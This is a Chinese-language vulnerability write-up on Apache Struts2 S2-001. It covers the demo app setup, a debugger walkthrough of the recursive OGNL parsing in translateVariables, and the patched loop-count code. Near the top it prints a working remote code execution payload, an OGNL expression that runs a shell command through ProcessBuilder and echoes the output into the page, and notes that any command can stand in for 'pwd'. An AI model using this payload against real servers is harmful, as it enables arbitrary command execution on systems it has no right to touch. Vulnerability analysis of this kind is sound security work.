環境搭建:win10 eclipes ee struts2.0.1 tomcat8
導入最基礎的jar包
web.xml
<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://xmlns.jcp.org/xml/ns/javaee" xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_3_1.xsd" id="WebApp_ID" version="3.1">
<display-name>S2-001 Example</display-name>
<filter>
<filter-name>struts2</filter-name>
<filter-class>org.apache.struts2.dispatcher.FilterDispatcher</filter-class>
</filter>
<filter-mapping>
<filter-name>struts2</filter-name>
<url-pattern>/*</url-pattern>
</filter-mapping>
<welcome-file-list>
<welcome-file>index.jsp</welcome-file>
</welcome-file-list>
</web-app>
LoginAction.java
package com.au.demo.action;
import com.opensymphony.xwork2.ActionSupport;
public class LoginAction extends ActionSupport {
private String username = null;
private String password = null;
public String getUsername() {
return this.username;
}
public String getPassword() {
return this.password;
}
public void setUsername(String username) {
this.username = username;
}
public void setPassword(String password) {
this.password = password;
}
public String execute() throws Exception {
if ((this.username.isEmpty()) || (this.password.isEmpty())) {
return ERROR;
}
if ((this.username.equalsIgnoreCase("admin"))
&& (this.password.equals("password"))) {
return SUCCESS;
}
return ERROR;
}
}
index.jsp
<%@ page language="java" contentType="text/html; charset=UTF-8"
pageEncoding="UTF-8"%>
<%@ taglib prefix="s" uri="/struts-tags" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>S2-001</title>
</head>
<body>
<h2>S2-001 Demo</h2>
<s:form action="login">
<s:textfield name="username" label="username" />
<s:textfield name="password" label="password" />
<s:submit></s:submit>
</s:form>
</body>
</html>
struts.xml
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE struts PUBLIC
"-//Apache Software Foundation//DTD Struts Configuration 2.3//EN"
"http://struts.apache.org/dtds/struts-2.3.dtd">
<struts>
<constant name="struts.devMode" value="true" />
<package name="S2-001" extends="struts-default">
<action name="login" class="com.au.demo.action.LoginAction">
<result name="success">/welcome.jsp</result>
<result name="error">/index.jsp</result>
</action>
</package>
</struts>
導入對應的xwork.jar源碼進行調試(找源碼坑死我了)
有需要的這是本人搭建的環境下載地址:
https://pan.baidu.com/s/1_BBEIfoX-WSjLHQcqstVPA 提取碼:aklq
測試點擊提交:
構造的ognl被執行:
任意代碼執行的POC:
%{
#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"pwd"})).redirectErrorStream(true).start(),
#b=#a.getInputStream(),
#c=new java.io.InputStreamReader(#b),
#d=new java.io.BufferedReader(#c),
#e=new char[50000],
#d.read(#e),
#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),
#f.getWriter().println(new java.lang.String(#e)),
#f.getWriter().flush(),
#f.getWriter().close()
}
將pwd
替換爲對應的命令,即可執行。
漏洞分析:
漏洞成因:
可執行代碼(ognl(可理解爲代碼)):
在translateVariables方法
中,遞歸解析表達式,在處理完%{password}
後將password
的值直接取出並繼續在while
循環中解析,若用戶輸入的password是惡意的ognl表達式,則得以解析執行。
輸入點:可構造惡意參數
輸出點:利用登錄失敗會重新返回頁面並回帶之前的輸入內容
在xwork的jar包下com.opensymphony.xwork2.util.TextUtils 98行設置斷點debug tomcat單步調試
關鍵代碼:
public static Object translateVariables(char open, String expression, ValueStack stack, Class asType, ParsedValueEvaluator evaluator) {
// deal with the "pure" expressions first!
//expression = expression.trim();
Object result = expression;
while (true) {
int start = expression.indexOf(open + "{");
int length = expression.length();
int x = start + 2;
int end;
char c;
int count = 1;
while (start != -1 && x < length && count != 0) {
c = expression.charAt(x++);
if (c == '{') {
count++;
} else if (c == '}') {
count--;
}
}
end = x - 1;
if ((start != -1) && (end != -1) && (count == 0)) {
String var = expression.substring(start + 2, end);
Object o = stack.findValue(var, asType);
if (evaluator != null) {
o = evaluator.evaluate(o);
}
String left = expression.substring(0, start);
String right = expression.substring(end + 1);
if (o != null) {
if (TextUtils.stringSet(left)) {
result = left + o;
} else {
result = o;
}
if (TextUtils.stringSet(right)) {
result = result + right;
}
expression = left + o + right;
} else {
// the variable doesn't exist, so don't display anything
result = left + right;
expression = left + right;
}
} else {
break;
}
}
return XWorkConverter.getInstance().convertValue(stack.getContext(), result, asType);
}
通過對比username和password來進行分析:
順序執行,expression值爲username
多個return遞歸回到該方法,通過 stack.findValue() 得到username的輸入值, 最後aaa 被賦值給 expression
注意這裏和password進行比較~
繼續單步調試再次進入該方法(遞歸解析ognl):不符合while執行118行
此時不符合if條件 if ((start != -1) && (end != -1) && (count == 0))
進入多次return結束對username標籤的執行回顯到頁面上
順序執行,expression值爲password
多個return遞歸回到該方法,通過 stack.findValue() 得到password的輸入值,此時我們輸入password的值 %{3+4} 被賦值給 expression
再次進入該方法,此時爲ognl表示式,符合while條件和if判斷,接下來就順序解析了我們的 %{3+4} expression賦值爲7
進入多次return結束對password標籤的執行回顯到頁面上
漏洞修復:
改變了ognl表達式的解析方法從而不會產生遞歸解析,用戶的輸入也不會再解析執行。
修補後的代碼:增加判斷
if (loopCount > maxLoopCount) {
// translateVariables prevent infinite loop / expression recursive evaluation
break;
}
當解析完一層表達式後,使其不符合上述判斷,不再向下執行,執行break,跳出while(true)循環
源碼(註釋寫的很清楚):
public static Object translateVariables(char open, String expression, ValueStack stack, Class asType, ParsedValueEvaluator evaluator, int maxLoopCount) {
// deal with the "pure" expressions first!
//expression = expression.trim();
Object result = expression;
int loopCount = 1;
int pos = 0;
while (true) {
int start = expression.indexOf(open + "{", pos);
if (start == -1) {
pos = 0;
loopCount++;
start = expression.indexOf(open + "{");
}
if (loopCount > maxLoopCount) {
// translateVariables prevent infinite loop / expression recursive evaluation
break;
}
int length = expression.length();
int x = start + 2;
int end;
char c;
int count = 1;
while (start != -1 && x < length && count != 0) {
c = expression.charAt(x++);
if (c == '{') {
count++;
} else if (c == '}') {
count--;
}
}
end = x - 1;